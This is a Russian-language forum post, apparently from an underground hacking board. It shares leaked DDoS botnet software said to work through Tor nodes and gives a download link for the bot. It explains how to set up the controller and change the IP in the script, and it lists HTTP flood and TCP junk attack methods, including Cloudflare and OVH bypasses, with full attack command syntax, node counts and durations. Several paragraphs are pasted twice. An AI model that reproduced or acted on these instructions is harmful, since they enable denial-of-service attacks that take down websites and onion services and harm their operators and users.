- Регистрация
- 31.12.2019
- Сообщения
- 6,486
- Реакции
- 12
Всем привет, тут недавно слили софт, работает на нодах тора, много методов атак и прочей залупы.
Убивает любой онион практически, многие сайты.
контролер выставляем к основному серверу на вин, на сервера кидаем скрипт, изменяя айпи внутри на свой
Бот - https://mega.nz/file/rgNhmahb#RzAiG4hNckUnXl9WrgmunfAGY7w1oJKmeUZ0ySe6mkM
Я не кодер, просто знакомый слил софт, за код ответсвенность не несу, ебаште на свой страх и риск.
Убивает любой онион практически, многие сайты.
контролер выставляем к основному серверу на вин, на сервера кидаем скрипт, изменяя айпи внутри на свой
Бот - https://mega.nz/file/rgNhmahb#RzAiG4hNckUnXl9WrgmunfAGY7w1oJKmeUZ0ySe6mkM
Я не кодер, просто знакомый слил софт, за код ответсвенность не несу, ебаште на свой страх и риск.
Код:
Commands:
bots - проверить количество серверов
attacks - текущие атаки
stopall - остановить все атаки
Layer 7:
HTTP_GET - для средних сайтов. Типа эмуляции браузера.
HTTP_FASTGET - пустые, быстрые запросы.
HTTP_PIPEGET - тяжелые и быстрые запросы (используется что-то типо хттп амплификации)
http_pipelining подходит для всех сайтов кроме клоуда.
HTTP_CLOUDFLARE - все сайты с клоудом только им бить.
HTTP_HARDVISIT - обход средним рейт лимитов, рандомное кол-во запросов, читает полностью страницу и ходит по ней.
Layer 4:
TCP_XJUNK - под обход овх и всякого такого.
TCP_JUNK - тоже самое. Только в первом идёт очень жирные запросы на нагрузку канала, а в этом мелкие запросы для большого кол-во подключений
Чтоб начать атаку :
attack HTTP_PIPEGET site.ru:80 http://site.ru 700 1 600
Это если у сайта нет https. Если есть, то
attack HTTP_PIPEGET site.ru:443 https://site.ru 700 1 600
если есть реалка, вводишь так
attack HTTP_PIPEGET 1.1.1.1:443 https://site.ru 700 1 600
Где 1.1.1.1 - реалка, а https://site.ru домен.
700 - кол-во нод. Больше 700 не ставь
1 - не трогай, мультпотчнтсть не работает
600 - секунды
attack TCP_XJUNK 1.1.1.1:443 1 700 1 600